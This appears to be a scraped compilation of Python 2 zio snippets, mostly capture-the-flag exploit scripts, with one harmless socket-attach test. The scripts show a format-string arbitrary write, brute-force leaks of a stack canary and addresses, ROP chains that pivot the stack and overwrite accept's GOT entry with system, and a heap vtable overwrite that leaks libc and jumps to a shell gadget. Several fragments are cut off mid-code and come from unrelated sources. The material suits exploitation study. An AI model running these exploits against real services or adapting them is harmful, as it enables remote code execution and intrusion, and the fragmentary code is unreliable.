    # not needed (diagnostic only): prints the string at slot 49
    io.writeline("%49$s")
    print HEX(io.readline().strip("\n"))

    # not needed (diagnostic only): reads and discards one line
    io.writeline("%%%d$p" % index3)
    io.readline()

    addr = 0x0804A01C
    value = 0x41424344
    # four single-byte (%hhn) writes placing `addr`, one byte per iteration
    for i in range(4):
        do_fmt(io, "%%%dc%%17$hhn" % ((path + i) & 0xFF))
        k = (addr >> (i * 8)) & 0xFF
        if k != 0:
            do_fmt(io, "%%%dc%%49$hhn" % k)
        else:
            # "%0c" would still emit one character, so a zero byte is written without padding
            do_fmt(io, "%%49$hhn")

    do_fmt(io, "%%%dc%%17$hhn" % (path & 0xFF))

    # same scheme for `value`, via the slot computed in index3
    for i in range(4):
        do_fmt(io, "%%%dc%%49$hhn" % ((addr + i) & 0xFF))
        k = (value >> (i * 8)) & 0xFF
        if k != 0:
            do_fmt(io, "%%%dc%%%d$hhn" % (k, index3))
        else:
            do_fmt(io, "%%%d$hhn" % index3)

    # NOTE(review): presumably pauses for a debugger to attach — confirm; remove for unattended runs
    io.gdb_hint()

    io.interact()
Пример #45
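    def test_attach_socket(self):
        """zio can be attached to an already-connected socket object.

        A throwaway ``socat`` listener on a random local port answers with a
        fixed HTTP-style reply.  The status line is consumed straight from the
        raw socket, the socket is then handed to ``zio(s)`` and the remaining
        header, blank and body lines are read through zio.  Up to four random
        ports are tried; the listener process is stopped on every path, including
        a failed connect.
        """
        def stop_listener(p):
            # Ask socat to exit, wait up to ~2s for it, then kill it as a last resort.
            p.terminate()
            for _ in range(10):
                if p.poll() is not None:
                    return
                time.sleep(0.2)
            try:
                p.kill()
            except OSError:
                pass  # it exited between poll() and kill(); nothing left to do

        print ''
        for _ in range(4):
            port = random.randint(31337, 65530)
            p = subprocess.Popen(['socat', 'TCP-LISTEN:%d,crlf' % port, 'SYSTEM:"echo HTTP/1.0 200; echo Content-Type\: text/plain; echo; echo Hello, zio;"'])
            time.sleep(0.2)
            # returncode is only populated by poll()/wait(), so poll() explicitly;
            # a non-None result means the listener died at once (e.g. port in use)
            if p.poll() is not None:
                continue
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                s.connect(('127.0.0.1', port))
                # one byte at a time, presumably so nothing past the status line is buffered before zio takes over
                line = ''
                while True:
                    c = s.recv(1)
                    if not c:
                        break
                    line += c
                    if '\n' in line:
                        break
                self.assertEqual(line.rstrip(), "HTTP/1.0 200", repr(line))

                io = zio(s)
                line = io.readline()
                self.assertEqual(line.rstrip(), "Content-Type: text/plain", repr(line))
                io.readline()  # the empty line that terminates the headers
                line = io.readline()
                self.assertEqual(line.rstrip(), "Hello, zio", repr(line))
                io.end()
                io.close()
            except socket.error:
                # could not talk to this listener: release the socket and stop socat before retrying
                s.close()
                stop_listener(p)
                continue
            stop_listener(p)
            break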
Пример #46
def a_byte(num):
    """Extend the module-level ``payload`` by one byte, trying values 0..255 in order.

    A fresh connection to (ip, port) is opened per candidate; after a 2s
    pause the menu is driven to the '(y/n) ' prompt and payload + candidate
    is sent.  The candidate is accepted — appended to ``payload`` — when the
    service prints a non-empty second line; a TIMEOUT closes that connection
    and moves on.  Returns my_hex(address) for the accepted byte, or None
    when no candidate matched.  ``num`` is unused.  Depends on module-level
    ip, port, payload, my_hex and TIMEOUT.
    NOTE(review): io is closed only on the TIMEOUT path; every other
    iteration and the returning one leave the connection open.
    """
    global payload
    # leftover from the commented-out while loop below; `for` rebinds address each pass
    address = 0
    #while address <= 255:
    for address in range(256):
        io = zio((ip, port), timeout = 3, print_write = COLORED(REPR))
        time.sleep(2)
        io.read_until('>')
        io.write('4')
        io.read_until('(y/n) ')
        io.write(payload + chr(address))
        try:
            io.readline()
            data = io.readline()
            if data != '':
                payload += chr(address)
                result = my_hex(address)
                return result
            # no effect: the loop variable is reassigned on the next pass
            address += 1
        except TIMEOUT:
            io.close()
            continue
Пример #47
from zio import *
import random

target = ("pwnable.kr", 9009)

# Connects at import time (module-level side effect) and answers the first
# two prompts before any of the helpers below are defined.
io = zio(target, timeout = 9999)

io.read_until("(Y/N)\n")
io.write("Y\n")
io.read_until("Choice: ")
io.write("1\n")

def read_timeout(io, timeout = 9999):
	"""Keep reading from *io* until a read yields nothing but whitespace.

	Each read is io.read_timeout(timeout).  Chunks containing any
	non-whitespace character are discarded; the first empty or
	whitespace-only chunk is returned as-is.
	"""
	chunk = io.read_timeout(timeout)
	while chunk.strip():
		chunk = io.read_timeout(timeout)
	return chunk



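def get_status(data):
	"""Parse the player's and the dealer's totals out of one round's output.

	Args:
		data: text captured from the service, containing the fragments
			'Your Total is <n>' and 'The Dealer Has a Total of <n>'.
	Returns:
		(my_value, dealer_value) as ints.
	Raises:
		ValueError: if either marker is missing, or the text after it up to
			the end of the line is not an int.  A missing marker used to be
			silently treated as found at offset -1.
	"""
	my_value = _int_after(data, "Your Total is ")
	dealer_value = _int_after(data, "The Dealer Has a Total of ")
	return my_value, dealer_value


def _int_after(data, marker):
	"""Return the int that follows *marker* up to the end of its line in *data*."""
	pos_s = data.find(marker)
	if pos_s < 0:
		raise ValueError("marker %r not found in service output" % marker)
	pos_s += len(marker)
	pos_e = data.find("\n", pos_s)
	if pos_e < 0:
		# last line without a trailing newline: take everything to the end
		pos_e = len(data)
	return int(data[pos_s:pos_e])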
Пример #48
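def get_io(target):
	"""Open a zio channel to *target* with a 9999-second timeout and no echo.

	Read/write echoing is intentionally off.  To trace a session pass
	print_read=COLORED(RAW, "green") and print_write=COLORED(RAW, "blue")
	to zio; they are not computed up front because COLORED(...) is pure and
	unused values would only be dead code.
	"""
	return zio(target, timeout = 9999)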
Пример #49
#!/usr/bin/python2.7  
# -*- coding: utf-8 -*- 
'''
Created on 2014年11月29日

@author: yf
'''

from zio import *
import re
import time

# Spawns the local binary at import time (module-level side effect); the
# remote variant is kept commented out as a toggle.
io = zio('./qoobee4')#, print_write=False, print_read=False)
# io = zio(('10.11.12.13',1415), print_write=False, print_read=False)
lose_dic = ['scissor','rock','paper']
right_dic = ['paper', 'scissor','rock']
# NOTE(review): 35 appears twice and 20/31 are absent — confirm this is intentional
divset = [17, 16, 18, 19, 21, 22,23,24,25,26,27,28,29,30, 32 , 33 , 34  , 35 , 35  , 36 ,  37 , 38 , 39 , 40]
rightset = []
flag = ''


def losenum(modnum):
    """Return (modnum - 1) mod 3, i.e. the previous entry in a three-element cycle."""
    return (modnum + 2) % 3

# def testdiv(modnum):
# #     while True:
#     io.read_until('Your Choice: ')
#     io.writeline('7')
#     io.read_until('Select one:')
#     io.writeline('%d' % losenum(modnum))
#     io.read_until('number(0-100)? ')
Пример #50
Файл: rsbo.py Проект: Qoobee/CTF
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from zio import *

# NOTE(review): the first ip is dead — it is overwritten on the next line
ip = '210.61.8.96'
ip = '10.211.55.48'
port = 51342

# connects at import time (module-level side effect); only writes are echoed
io = zio((ip, port), timeout = 1000, print_write = COLORED(REPR))

# addresses of one specific 32-bit build (PLT stubs, data buffer, gadgets)
open_plt = 0x8048420
flag = 0x80487D0
read_plt = 0x80483E0
buf = 0x0804A0A1
write_plt = 0x8048450
read_80_bytes = 0x804865C
gadget1 = 0x804879E
gadget2 = 0x804879D
pivot = 0x804867D

# 108 NUL bytes of padding, then packed 32-bit values (l32) appended in order
payload = ""
payload += '\x00'*108
payload += l32(read_80_bytes)
payload += l32(gadget1) # pop pop ret
payload += l32(buf) # read again
payload += l32(buf) # ebp <- buf
payload += l32(pivot) # mov esp, ebp

# fd = open("/home/rsbo/flag", 0);
payload += l32(0xdeadbeef)
#payload += l32(open_plt) + l32(flag) + l32(0)
Пример #51
from zio import *
# Spawn ./main, send one input containing embedded NUL bytes, then hand the
# terminal to the user.  The channel is never closed explicitly.
io = zio("./main", timeout = 9999)
io.write("1111\x002222\x003333\n123123")
io.interact()
Пример #52
#!/usr/bin/env python2.7
#encoding:utf-8

from zio import *
import time
# The local target is dead code: it is overwritten by the remote one right after.
target = ('127.0.0.1',9979)
target = ('120.55.113.21',4799)
io = zio(target,timeout=5,print_read=COLORED(REPR,'cyan'),print_write=COLORED(REPR,'red'))

# log in, send an empty line, then pick menu entry 31
io.writeline('thatsme')
io.writeline()
time.sleep(0.5)
io.writeline('31')
io.read_until('吧')
io.readline()

# Fixed answer table keyed by the question text (everything before ' sum').
# A question that is not in the table raises KeyError.
smps = {'1*2+3':10,'4-3+7':2,'9*3-5':4,'6+7*8':166,'15+3*8-7':255,'3*8+11+4':316}

# three questions are asked in a row; answer each from the table
for _ in range(3):
    line = io.readline()
    question = line[:line.find('sum') - 1].strip()
    io.writeline(str(smps[question]))

io.writeline()
time.sleep(0.5)
io.read_until(':)')

io.readline()
io.readline()
Пример #53
def get_io(target):
	"""Return a zio channel to *target* opened with a 9999-second timeout."""
	return zio(target, timeout = 9999)
Пример #54
def get_io(target):
    """Open a zio channel to *target* with a 5-second timeout and no echo.

    Both print_read and print_write are False; swap `quiet` for
    COLORED(RAW, "green") / COLORED(RAW, "blue") when a visible trace is wanted.
    """
    quiet = False
    return zio(target, timeout=5, print_read=quiet, print_write=quiet)
Пример #55
Файл: lhc.py Проект: Qoobee/CTF
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from zio import *

target = ('10.211.55.56', 12345)
# connects at import time (module-level side effect) and echoes both directions
io = zio(target, timeout=10000, print_read=COLORED(REPR,'yellow'),\
        print_write=COLORED(REPR,'blue'))
io.read_until('Send block 0\n')
Пример #56
# encoding:utf-8
# 32-bit, no NX: overwrite a function pointer in the .bss segment

from zio import *
from pwn import *

# fixed addresses of one specific 32-bit build
func = 0x804A160
bss_data = 0x804A060

# pwntools context; log_level='debug' makes pwntools print all traffic it handles.
# NOTE(review): `from zio import *` and `from pwn import *` are both star-imported
# above; several names overlap, and the later pwn import wins for those.
context(arch='i386', os='linux', log_level='debug')

# connects at import time (module-level side effect); the local variant is a commented-out toggle
io = zio(('101.200.187.112',9004),timeout = 9999, 
#io = zio('./pwn1', timeout = 9999, 
        print_read = COLORED(RAW, 'green'), print_write = COLORED(RAW,'blue'))



io.read_until(':')

#io.gdb_hint(breakpoints= [0x08048600])

'''
Disassembly of section .text:

08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 50                    push   %eax
 8048063: 68 2f 2f 73 68        push   $0x68732f2f
 8048068: 68 2f 62 69 6e        push   $0x6e69622f
 804806d: 89 e3                 mov    %esp,%ebx
 804806f: 89 c1                 mov    %eax,%ecx
def exploit(host):
    """Drive the TV/Movie menu service at *host*: leak one address, then rewrite a vtable.

    Python 2 only (``print`` statements, byte-string literals).  All
    addresses and libc offsets (0x6FE30, 0x46640, 0x4652C, ...) belong to
    one specific build.  The menu helpers are closures over ``io``.  The
    channel is handed to io.interact() and never closed here.
    """
    io = None
    try:
        io = zio(host, timeout=1000, print_read=False, print_write=False)
        if not io:
            raise Exception
    # NOTE(review): bare except swallows everything (KeyboardInterrupt included)
    # and exit(0) reports success to the caller; narrow the clause and use a non-zero status
    except:
        print "can't  caonnect server!"
        exit(0)

    # NOTE(review): the length checks below use assert and vanish under `python -O`
    def add_TV(name, Season, Rating, intro):
        assert len(name) < 64 and len(Season) < 16 and len(Rating) < 16 and len(intro) < 128
        io.read_until("Your choice?")
        io.writeline("1")
        io.writeline(name)
        io.writeline(Season)
        io.writeline(Rating)
        io.writeline(intro)

    def add_Movie(name, Actors, Rating, intro):
        assert len(name) < 64 and len(intro) < 128
        io.read_until("Your choice?")
        io.writeline("2")
        io.writeline(name)
        io.writeline(Actors)
        io.writeline(Rating)
        io.writeline(intro)

    def remove_obj(name):
        io.read_until("Your choice?")
        io.writeline("3")
        io.writeline(str(name))

    def show_all():
        io.read_until("Your choice?")
        io.writeline("4")

    # leak heap base
    # NOTE(review): unused stub; `heap` is never defined, so calling it raises NameError
    def leak_heap():
        return heap

    # leak libc base
    # NOTE(review): unused stub; `libc` is never defined, so calling it raises NameError
    def leak_libc():
        return libc

    def write_TV_Vtable(vtable, mark=";/bin/sh;"):
        # Build a 0x60-byte string: packed pointers, '@' padding, then `mark`;
        # then shape the heap with four adds / four removes and two Movie adds.
        # Returns the single-character name under which the overwritten entry appears.
        vtable_str = ""
        vtable_size = 0x60
        tv_name = chr(vtable_size + 0x10 + 1)  # chr(0x71) == 'q'
        for fn in vtable:
            vtable_str += l64(fn)
        vtable_str = vtable_str + "@" * (vtable_size - len(vtable_str) - len(mark)) + mark
        # print vtable_str
        assert len(vtable_str) == vtable_size
        add_TV("00000000", "0", "0", "0" * 0x7F)
        add_TV("11111111", "0", "0", "0" * 0x7F)
        add_TV("22222222", "0", "0", "0" * 0x7F)
        add_TV("33333333", "0", "0", "0" * 0x7F)
        add_TV("33333333", "0", "0", "0" * 0x7F)
        remove_obj("22222222")
        remove_obj("11111111")
        remove_obj("00000000")
        remove_obj("33333333")
        add_Movie("padding", "0" * 0xE0, "1", "0" * 0x7F)
        # do not remove 'overwriting'
        add_Movie("overwriting", vtable_str, "1", "1" * 0x7F)
        # print "TV: {0}'s vtable has been overwrited!".format(tv_name)
        return tv_name

    def read_any_where_once(where):
        # Reads 8 bytes at `where` by listing all entries and parsing the 'actors: ' line.
        p_nullstub = 0x0004012A0
        p_printMovieInfo = 0x004011B0
        tv_vtable = [p_printMovieInfo, p_nullstub, p_nullstub]
        tv_name = write_TV_Vtable(vtable=tv_vtable)
        floatnum = 0x0101010101010101
        add_TV("leak_libc", "0", "0", l64(floatnum) + l64(where))
        # trigger that tv_name will call p_printMovieInfo to leak info from address:where
        show_all()
        io.read_until("Movie <{0}>: ".format(tv_name))
        # NOTE(review): this value is discarded — the next line rebinds `result`
        result = io.read_until("actors: ")
        result = io.readline().strip()
        # right-pad with NULs so short leaks still unpack as 8 bytes
        result = result.ljust(8, "\x00")
        value = l64(result[0:8])
        return value

    # leak info
    got_puts = 0x601C40
    puts = read_any_where_once(got_puts)
    print "[+] puts\t=>\t{0}".format(hex(puts))

    libc_base = puts - 0x6FE30
    print "[+] libc_base\t=>\t{0}".format(hex(libc_base))

    system = libc_base + 0x46640
    print "[+] system\t=>\t{0}".format(hex(system))

    shot_shell = libc_base + 0x004652C
    print "[+] shot_shell\t=>\t{0}".format(hex(shot_shell))

    # fake vtable
    # NOTE(review): p_nullstub / p_printMovieInfo are assigned here but unused (tv_vtable uses shot_shell)
    p_nullstub = 0x0004012A0
    p_printMovieInfo = 0x004011B0
    tv_vtable = [shot_shell, shot_shell, shot_shell]
    tv_name = write_TV_Vtable(tv_vtable)

    # trigger that tv_name will call shot_shell
    # remove_obj(tv_name)
    show_all()

    print "[+] shell open "
    io.writeline("id")
    io.interact()
Пример #58
# fixed addresses of one specific 32-bit build
buf = 0x804a058
# gadgets: ppr and pr are pppr + 1 / + 2 — presumably entering the same
# pop-sequence one and two instructions later (fewer pops before ret); confirm against the binary
pppr = 0x8048c0d
ppr = pppr + 1
pr = ppr + 1

recv_line = 0x8048744
send_len = 0x80487cc
send_str = 0x8048848
accept_plt = 0x80485c0
accept_got = 0x804a01c
# libc-relative offsets (presumably for one specific libc build); only their difference is used
accept_addr = 0xf0200
system_addr = 0x3ee80
system_accept_diff = system_addr - accept_addr

# `target` is defined outside this excerpt; connects at import time, echoing reads only
io = zio(target, print_write=False, print_read=COLORED(REPR, 'red'), timeout=9999999)

# 268 bytes of padding precede the chain built below
payload = 'A' * 268
rop_chain = [
            # system()
            buf,
            0x44444444,
            accept_plt,
            
            # recv_line(), overwrite accept got
            accept_got,
            pr,
            recv_line,

            # sendlen(), get the got of accept
            4,
Пример #59
#leak canary, rbp, ret_address
# byte_by_byte, log, canary_value, save_rbp, ret_address and ip are defined
# outside this excerpt; each byte_by_byte() call is expected to fill one of
# the three values reported below.
for x in range(3):
	byte_by_byte()
log("----------result----------", 'blue')
log("canary: " + hex(canary_value), 'red')
log("save_rbp: " + hex(save_rbp), 'red')
log("ret_address: " + hex(ret_address), 'red')

#get libc_addr
log("----------get libc_addr----------", 'blue')
# 0xe15 is the build-specific offset of the leaked return address from the image base
base_addr = ret_address - 0xe15
log("base_addr: " + hex(base_addr), 'red')
# image-relative offset; always used as base_addr + dprintf_got below
dprintf_got = 0x202040
log("dprintf_got: " + hex(dprintf_got), 'red')
fd = 0x4
# new connection for this stage; the channel is not closed within this excerpt
io = zio((ip, 1234), timeout = 100000, print_read = REPR, print_write = COLORED(REPR))

# 8200 bytes of padding, then the leaked canary and saved rbp, then packed 64-bit values (l64)
payload = "A"*8200 + l64(canary_value) + l64(save_rbp) + l64(base_addr+0xec6) + "A"*8 + l64(0x0) +\
			"A"*8 + l64(base_addr+dprintf_got) + "A"*8 + l64(base_addr+dprintf_got) + l64(fd) +\
			l64(base_addr+0xeb0)
io.write(payload)
io.read_until('thanks.\n')
# the reply line is right-padded with NULs so a short leak still unpacks as 8 bytes
dprintf_addr = l64(io.readline().ljust(8, '\x00'))
log("dprintf_addr: " + hex(dprintf_addr), 'red')


# # local
# dprintf_offset = 0x4E640
# system_offset = 0x3FF80
# binsh_offset = 0x14C28D
#server